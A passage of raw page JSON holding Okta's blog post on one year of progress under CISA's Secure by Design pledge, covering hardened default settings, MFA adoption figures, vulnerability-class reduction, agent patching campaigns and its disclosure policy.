"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg?w=15&h=23&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg?w=29&h=44&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg?w=58&h=87&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg?w=116&h=174&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg?w=58&h=87&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg?w=15&h=23&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg?w=29&h=44&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg?w=58&h=87&fl=progressive&q=50&fm=jpg 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg?w=116&h=174&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#e8e8d8","width":58,"height":87}}}],"title":"Okta’s Secure by Design Pledge - One Year On","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"summary":{"summary":"A one-year progress update on Okta's commitment to the CISA Secure by Design Pledge."},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Foreword \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nA year ago, Okta was among the first technology providers to pledge our commitment to the US Cybersecurity and Infrastructure Security Agency (CISA)'s seven Secure by Design principles.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To CISA’s great credit, the Secure by Design voluntary pledge program has created strong momentum across the cybersecurity industry. Nearly 300 technology companies have since signed the pledge, with most having made significant strides in documenting their progress toward these goals.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One year on, we’re taking a moment to reflect and share an update on Okta’s progress.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As part of Okta’s commitment to Secure by Design, the default configuration for all new Okta tenants has been hardened as follows:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"New Default\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Details\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Context\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Date of change\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Secure Creation of API Tokens\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators are prompted for step-up authentication and prompted to assign an IP allowlist for all new SSWS API tokens.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Administrative Users, Okta Identity Engine and Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"May 2025\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Phishing Resistance\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All new authentication and account management policies in Okta Workforce Identity will enforce phishing resistance by default if users are enrolled in phishing-resistant authenticators.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Users, Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"April 2025\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Step-Up Authentication\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protected Actions are enabled by default, ensuring step-up authentication is applied for policy modifications.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Administrative Users, Okta Identity Engine and Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"April 2025\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Maximum Global Session Lifetime\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The default maximum Okta global session lifetime is now set to 24 hours.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Users, Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"March 2025\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reauthentication Frequency\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The default reauthentication frequency in authentication policies was changed to one hour. \\n\\nThe option to force re-authentication “every time a user signs in to resource” is also labelled as the most secure option available in Okta Identity Engine.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Users, Okta Identity Engine and Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"March 2025 in Okta Identity Engine\\n\\nMay 2025 in Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA Requirement\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The default selection presented to administrators creating a new authentication policy in Okta Identity Engine is now “Any 2 factor types”.\\n\\nIn the Okta Classic Engine, MFA is now enabled by default in new app sign-on rules when MFA factors are available to users.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Users, Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"March 2025\\n\\nMay 2025 in Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Session risk Evaluation\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User and entity session risk evaluations are now available in System Log for all accounts directly assigned with Super Administrator permissions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrative Users, Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"March 2025\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Directory Agent Hardening\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta directory agents now support end to end encryption and sender-constrained tokens using DPoP by default.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Users, Okta Identity Engine and Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"July-\\nNovember 2024 in Okta Identity Engine\\n\\nJanuary 2025 in Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA Enforcement\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All new authentication policies for the Okta Admin Console require multi-factor authentication.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Administrative Users, Okta Identity Engine, Okta Classic Engine and Auth0 Management Console\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"August 2024\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"IP Session Binding\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By default, all API and web requests made to the Okta service by users with administrative permissions are bound to the device IP address recorded at the time of sign-in.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Administrative Users, Okta Identity Engine and Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"August 2024\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Under the Secure by Design pledge, Okta committed to measurable improvements in seven key areas identified by CISA. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s full-year update for each of those initiatives is provided below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Driving Adoption of Multi-Factor Authentication\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate actions taken to measurably increase the use of multi-factor authentication across the manufacturer’s products.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has built on its best-in-class record for customer adoption of multi-factor authentication (MFA) among both users and administrators of Okta Workforce Identity.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During the course of the one-year pledge, Okta had three primary goals:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enforce MFA for all administrative access to management consoles,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Drive rapid adoption of high assurance, phishing-resistant authenticators such as Okta FastPass and FIDO2 passkeys,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reduce customer exposure to weaker authentication methods.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access to the Okta Admin Console or the Auth0 Management console now requires multi-factor authentication (MFA). \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reaching this milestone required an exhaustive program that restricted the ability for administrators to create a single factor authentication policy for the Okta Admin console, and worked closely with a large number of customers to ensure that their existing policies could meet this requirement prior to enforcement.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We identified early in the process that some customers needed more time to meet this requirement - especially customers that allowed inline MFA enrolment, used inbound federation or relied on certain configurations of third-party Privileged Access Management solutions to access the Okta Admin Console. Okta released several innovations, such as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.asqula.com/docs/guides/configure-claims-sharing/oktaoidc/main/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"authenticator claims sharing\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", to ensure MFA would always be applied, while maintaining a great experience for administrators. We thank these customers for taking this journey with us for the sake of our mutual security!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We’re also very pleased to see rapid growth in high assurance, phishing-resistant authentication factors during the course of the pledge. According to Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.asqula.com/au/blog/2025/03/businesses-at-work-2025/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Businesses at Work 2025\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" report, the volume of Okta FastPass authentications increased by 377% over 12 months. The total number of FastPass authentications backed by biometrics such as fingerprints or facial recognition increased by 288%. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By contrast, the use of lower assurance authentication methods has reduced: security questions by 12% and SMS/Voice Call by 14%.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. Reducing the use of default passwords\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate measurable progress towards reducing default passwords across the manufacturers’ products.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As noted at the halfway point of the pledge term, Okta did not feel it necessary to pursue any further changes regarding default passwords. Where on-premise appliances, clients or agents require default credentials at installation, Okta enforces the required rotation of these credentials at first sign-in.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Reduce common classes of vulnerabilities\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate actions taken towards enabling a significant measurable reduction in the prevalence of one or more vulnerability classes across the manufacturer’s products.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At the start of the pledge term, Okta committed to initiating a company-wide campaign to drive down exposure to a particular class of vulnerability.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our first task was to classify vulnerabilities using a consistent methodology across the multiple products and services developed by Okta. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Product Security aggregated vulnerability data from all Auth0 and Okta products to create a single source of truth where vulnerability data could be normalized, analyzed, and classified.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This analysis painted a clear picture of what required more focus: a subset of vulnerabilities classed as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Server Security Misconfigurations\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" in the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://bugcrowd.com/vulnerability-rating-taxonomy\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Bugcrowd VRT\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For each shortlisted vulnerability, Product Security conducted “deep reviews” - technical investigations focused on specific vulnerability types, scoped for the entire codebase of Okta products, per their robust \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.asqula.com/resources/whitepaper-secure-development-lifecycle/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"secure development practices\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". The reviews identified several issues that have since been remediated.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As part of this work, we developed and shared our methodology for reducing vulnerability classes. The methodology consists of distinct phases:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Data Analysis - the aggregation, classification and trend analysis of vulnerability information.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Scope Definition and Plan Execution - prioritizing results from data analysis based on frequency and risk, creating action plans, and executing and tracking remediation.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Program improvements - creating standard trending metrics, vulnerability classification standardization, and shorter feedback loops.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This methodology was shared with the CISA Secure by Design working group. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4. Drive improved customer patching hygiene\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate actions taken to measurably increase the installation of security patches by customers.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Under the shared responsibility model for security, customers are accountable for maintaining up-to-date versions of client software. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The CISA Secure by Design pledge promotes adoption of a “shared fate” approach to customer patching, where service providers play a more active role in steering customers toward better security outcomes. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has made measurable progress in our commitment to making it easy for customers to maintain up-to-date versions of client software.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During the course of the pledge, we embarked on a campaign to convince customers to upgrade their AD (Active Directory) or LDAP agents to versions that include additional security controls.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As background; some Okta Workforce Identity customers choose to delegate primary authentication to on-premise directories such as Active Directory (AD) or LDAP. In these hybrid identity flows, users signing in to access cloud resources provide credentials that are forwarded to an agent running on a host on the customer’s network to check their validity. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In these configurations, the integrity of the customer’s Okta implementation relies, to some degree, on the customer’s Active Directory hygiene. A disproportionate share of incidents reported by customers to Okta Identity Defence arise from an existing compromise of the customer’s Active Directory network.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In July 2024, Okta released a redesigned AD agent that adopted the “Demonstrating Proof of Possession” (DPoP) extension to OIDC, and added the same protection to the Okta LDAP agent from November 2024. While DPoP does not directly prevent a compromise of a Windows host, it can significantly reduce the blast radius for any compromise of the on-prem server(s) a customer uses to host these agents. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within 90 days of the release of the AD Agent, 44% of customers updated their agents to a version that included DPoP. A follow-up communications campaign, in which Okta mooted the possibility of removing support for versions that did not include these protections, drove adoption to 83%. The following version introduced support for end-to-end encryption.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We also observed that one of the primary instruments to achieving stronger customer patching hygiene is the availability and uptake of “automatic update” features in any given product. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We have observed that while customers are very comfortable with automatic update mechanisms in software deployed to end-user clients, we face more resistance when customers are asked to enable automatic updates in client-side software deployed to servers. There is legitimate concern among CISOs - largely based on adverse events at other vendors - as to whether suppliers adequately test updates for every possible customer configuration prior to their release. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During the term of the pledge, Okta ran direct-to-customer communications campaigns to assure customers of Okta’s strong record for stable updates. This drove a 6% increase in adoption. We continue to assess new ways of driving confidence in these controls. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"5. Publish a Vulnerability Disclosure Policy\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, publish a vulnerability disclosure policy (VDP) that authorizes testing by members of the public on products offered by the manufacturer, commits to not recommending or pursuing legal action against anyone engaging in good faith efforts to follow the VDP, provides a clear channel to report vulnerabilities, and allows for public disclosure of vulnerabilities in line with coordinated vulnerability disclosure best practices and international standards. \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has, as pledged, maintained 100% coverage of all Okta GA products in Bug Bounty programs and continues to publish a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.asqula.com/vulnerability-reporting-policy/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"vulnerability reporting policy\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and 